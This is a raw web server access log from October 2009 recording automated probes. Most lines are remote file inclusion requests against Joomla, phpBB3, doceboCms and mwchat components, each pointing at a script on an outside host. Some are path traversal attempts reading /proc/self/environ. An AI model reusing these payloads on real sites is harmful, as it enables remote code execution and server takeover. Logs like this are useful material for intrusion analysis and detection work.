61.129.64.174 - - [12/Oct/2009:01:53:08 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:53:09 -0400] "GET /logs/access_log.Q109081300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:53:15 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:53:28 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.143.43.216 - - [12/Oct/2009:01:53:29 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
221.143.43.216 - - [12/Oct/2009:01:53:29 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.143.43.216 - - [12/Oct/2009:01:53:31 -0400] "GET /logs/access_log.Q109081300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.143.43.216 - - [12/Oct/2009:01:53:48 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Oct/2009:01:53:55 -0400] "GET /rb? HTTP/1.1" 404 200 "-" "libwww-perl/5.803"
61.129.64.174 - - [12/Oct/2009:01:54:06 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:54:12 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:54:12 -0400] "GET /logs/access_log.Q109081300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:01:54:18 -0400] "GET /?custompluginfile[]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:01:54:18 -0400] "GET /logs/access_log.Q109061400/?custompluginfile[]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:01:54:18 -0400] "GET /logs/?custompluginfile[]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 21518 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:54:35 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:01:54:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
151.1.24.160 - - [12/Oct/2009:01:55:05 -0400] "GET /logs/error_log.Q109061400%20%20/?custompluginfile[]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:56:44 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:56:47 -0400] "GET /logs/access_log.Q109081300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:56:48 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:56:59 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:56:59 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:56:59 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:57:15 -0400] "GET /logs/access_log.Q109081300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:01:57:15 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.128.60.100 - - [12/Oct/2009:01:58:14 -0400] "GET /logs/access_log.Q109081300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.128.60.100 - - [12/Oct/2009:01:58:16 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:34 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:34 -0400] "GET /logs/access_log.Q109071200%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:34 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:37 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:37 -0400] "GET /logs/access_log.Q109071200%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:37 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:39 -0400] "GET /logs/access_log.Q109050700%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:41 -0400] "GET /logs/access_log.Q109050700%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:42 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:42 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:42 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:42 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:42 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:42 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:52 -0400] "GET /logs/access_log.Q109050700//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:01:58:52 -0400] "GET /logs/access_log.Q109050700//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
93.186.192.24 - - [12/Oct/2009:01:58:56 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
93.186.192.24 - - [12/Oct/2009:01:58:56 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
93.186.192.24 - - [12/Oct/2009:01:58:56 -0400] "GET /logs/access_log.Q109091000%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:01:59:03 -0400] "GET /logs/access_log.Q109091000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:01:59:03 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:01:59:03 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:01:59:03 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:01:59:03 -0400] "GET /logs/access_log.Q109091000%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:01:59:03 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.186.192.24 - - [12/Oct/2009:01:59:21 -0400] "GET /logs/access_log.Q109081200%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:01:59:50 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:01:59:50 -0400] "GET /logs/access_log.Q109091000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:01:59:50 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:01:59:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.12.13.152 - - [12/Oct/2009:02:00:28 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:02:00:28 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:02:00:28 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:02:00:28 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 21525 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:02:00:43 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:02:00:43 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:02:00:43 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:02:00:43 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:02:00:43 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:02:00:43 -0400] "GET /logs/access_log.Q109071200//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:02:00:51 -0400] "GET /logs/access_log.Q109050700//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:02:00:52 -0400] "GET /logs/access_log.Q109050700//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:03:33 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:03:33 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:03:34 -0400] "GET /logs/access_log.Q109061800%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.228.191.194 - - [12/Oct/2009:02:03:34 -0400] "GET /logs/access_log.Q109091000%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
67.228.191.194 - - [12/Oct/2009:02:03:34 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.228.191.194 - - [12/Oct/2009:02:03:34 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:03:35 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:03:35 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:03:35 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:03:35 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:03:38 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:02:03:48 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:02:03:48 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.135.218.37 - - [12/Oct/2009:02:03:48 -0400] "GET /logs/access_log.Q109091000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.228.191.194 - - [12/Oct/2009:02:03:59 -0400] "GET /logs/access_log.Q109081200%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:04:14 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:04:14 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:04:14 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:04:14 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:02:04:44 -0400] "GET /logs/access_log.Q109081300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:02:04:44 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:02:04:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.193.15.3 - - [12/Oct/2009:02:04:56 -0400] "GET /logs/access_log.Q109083000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:04:58 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:04:58 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:00 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:00 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:05:08 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:05:08 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:05:12 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:05:15 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:05:18 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:19 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:19 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:05:21 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:30 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:30 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:39 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:39 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:41 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:41 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:41 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:44 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:44 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:47 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
